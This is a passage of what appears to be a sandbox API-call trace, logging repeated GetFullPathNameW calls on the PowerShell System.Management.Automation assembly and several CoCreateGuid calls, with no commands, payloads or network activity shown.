	[0044.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.924] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x58116eb2, Data2=0xe3d1, Data3=0x4c6a, Data4=([0]=0x81, [1]=0xaa, [2]=0x84, [3]=0x43, [4]=0xee, [5]=0x6a, [6]=0x41, [7]=0x84))) returned 0x0
	[0044.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.927] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x25703e94, Data2=0xe58e, Data3=0x46c5, Data4=([0]=0x81, [1]=0x98, [2]=0x8f, [3]=0x70, [4]=0x76, [5]=0x9b, [6]=0x98, [7]=0xe0))) returned 0x0
	[0044.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.927] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x3d466981, Data2=0x5c9b, Data3=0x4b58, Data4=([0]=0x9a, [1]=0x7d, [2]=0x2b, [3]=0x1a, [4]=0x49, [5]=0x92, [6]=0xa8, [7]=0x6b))) returned 0x0
	[0044.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.928] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd5bfc6f1, Data2=0xf560, Data3=0x4907, Data4=([0]=0xbc, [1]=0xd9, [2]=0x1a, [3]=0x93, [4]=0xd9, [5]=0xf, [6]=0x8b, [7]=0x4a))) returned 0x0
	[0044.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.930] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xf5cea68c, Data2=0x1ba, Data3=0x4fc0, Data4=([0]=0xbd, [1]=0x85, [2]=0x28, [3]=0x52, [4]=0xac, [5]=0xab, [6]=0xf5, [7]=0x13))) returned 0x0
	[0044.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.930] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xa1e471a3, Data2=0x63e, Data3=0x495c, Data4=([0]=0x81, [1]=0xfb, [2]=0x7c, [3]=0xee, [4]=0x40, [5]=0x6d, [6]=0x8f, [7]=0x6b))) returned 0x0
	[0044.931] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xdc14acc4, Data2=0x8d6, Data3=0x4461, Data4=([0]=0xb0, [1]=0xa0, [2]=0x65, [3]=0x34, [4]=0x58, [5]=0xab, [6]=0xe2, [7]=0xf5))) returned 0x0
	[0044.931] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x721b6eac, Data2=0x61ce, Data3=0x4ea8, Data4=([0]=0x9d, [1]=0x5d, [2]=0xb9, [3]=0xd6, [4]=0xfa, [5]=0x1c, [6]=0xc5, [7]=0xac))) returned 0x0
	[0044.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.932] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x41342333, Data2=0x3898, Data3=0x4647, Data4=([0]=0xa7, [1]=0x23, [2]=0xfe, [3]=0xf, [4]=0x95, [5]=0x6c, [6]=0x3d, [7]=0x9d))) returned 0x0
	[0044.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0044.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
